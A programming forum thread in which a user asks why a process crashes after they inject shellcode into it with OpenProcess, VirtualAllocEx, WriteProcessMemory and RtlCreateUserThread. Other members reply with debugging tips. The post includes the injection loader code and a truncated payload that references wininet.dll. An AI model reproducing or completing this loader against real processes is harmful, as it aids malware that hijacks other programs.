RtlCreateUserThread best practices

capadleman
Junior Member
Posts: 3
Joined: Tue Jun 18, 2013 1:18 am

Post by capadleman »

Hi guys,
I have a shellcode; I used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
The code is executed successfully, but then the process crashes with a C000005 exception.

I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
I also tried calling ExitThread :thinking:
How do I avoid crashing the process?
Thanks.
Here is the code:

Code:

#include <windows.h>
#include <iostream>
using namespace std;

// ntdll ships no header for RtlCreateUserThread; the structure and prototype below
// follow the argument order used in the call further down (return value is an NTSTATUS).
typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID, *PCLIENT_ID;
typedef LONG (NTAPI *_RtlCreateUserThread)(HANDLE, PVOID, BOOLEAN, ULONG, SIZE_T, SIZE_T,
                                           PVOID, PVOID, PHANDLE, PCLIENT_ID);

// Fragment from inside the calling function; the surrounding declarations were
// missing from the original post and are filled in here.
HMODULE ntdll = GetModuleHandleA("ntdll.dll");
_RtlCreateUserThread RtlCreateUserThread =
    (_RtlCreateUserThread)GetProcAddress(ntdll, "RtlCreateUserThread");
DWORD pid;
HANDLE hThd = NULL;
CLIENT_ID cid;

cin >> pid;

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

// Commit an executable region in the target process and copy the payload into it.
LPVOID code = VirtualAllocEx(hProc, NULL, 508, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
const char *hex = "\xe9\xff\x00\x00\x00\xe8\x1b\x01"
                  "\x00\x00\x77\x69\x6e\x69\x6e\x65"
                  "\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....   // payload truncated in the original post
// Note: 509 bytes are written although 508 were requested; VirtualAllocEx commits
// whole pages, so this does not overrun the region, but the sizes should match.
DWORD sizeofHex = 509;
WriteProcessMemory(hProc, code, hex, sizeofHex, NULL);

// Start a thread in the target process at the start of the copied payload.
__try {
    RtlCreateUserThread(hProc, NULL, FALSE, 0, 0, 0, code, NULL, &hThd, &cid);
}
// The filter must return EXCEPTION_EXECUTE_HANDLER (1) for the handler to run. The
// original used GetExceptionCode() here; its negative NTSTATUS value is treated as
// EXCEPTION_CONTINUE_EXECUTION, so the handler would never be entered.
__except (EXCEPTION_EXECUTE_HANDLER) {
    return -1;
}
WaitForSingleObject(hThd, INFINITE);

CloseHandle(hThd);
CloseHandle(hProc);
NeOXOeN
Member
Posts: 95
Joined: Sun Feb 05, 2006 9:33 pm

Post by NeOXOeN »

We are glad to help you with your question.. :)


NeO
capadleman
Junior Member
Posts: 3
Joined: Tue Jun 18, 2013 1:18 am

Post by capadleman »

Okay, I updated my question Neo :sneaky:
NeOXOeN
Member
Posts: 95
Joined: Sun Feb 05, 2006 9:33 pm

Post by NeOXOeN »

Any code maybe, so people can have a look at what you did wrong? I will be just a little sarcastic.. I hope you will get the point of what I am saying..

I have a BOOK, it uses VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
The code is executed successfully but then the process crashes with a C000005 exception.

I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
I also tried calling ExitThread.
How to avoid crashing the process?... hmm, maybe doing it right ;O


I am not trying to be mean, I am just trying to help...

bye NeO
capadleman
Junior Member
Posts: 3
Joined: Tue Jun 18, 2013 1:18 am

Post by capadleman »

No problem, I'm at work now :)
so I need to get home to post the code.
Indy
Posts: 311
Joined: Sun Nov 08, 2009 4:32 am

Post by Indy »

RtlCreateUserThread() - bad API. Use kernel32, because win32 (not native). It makes no sense to mix..
_genuine
Member
Posts: 78
Joined: Wed Oct 07, 2009 4:55 pm

Post by _genuine »

There's still a lot of missing information here, so let me probe a bit.
First you should know that DEP is also a mechanism that can be enforced at the hardware level, trying to execute a shellcode on the stack regardless of whether you're using VirtualAlloc or not.
Also, I didn't get a chance to see exactly what the shellcode is doing, but have you suspended the target process before trying to execute the shellcode? I can see issues with the current code you're using that may cause some undefined behavior, namely at the point at which the shellcode is trying to be executed via remoteThread.
Where is the shellcode being injected? Also try adding a check to see if the call to VirtualAllocEx even succeeded; it would be a shame if it didn't, right? :)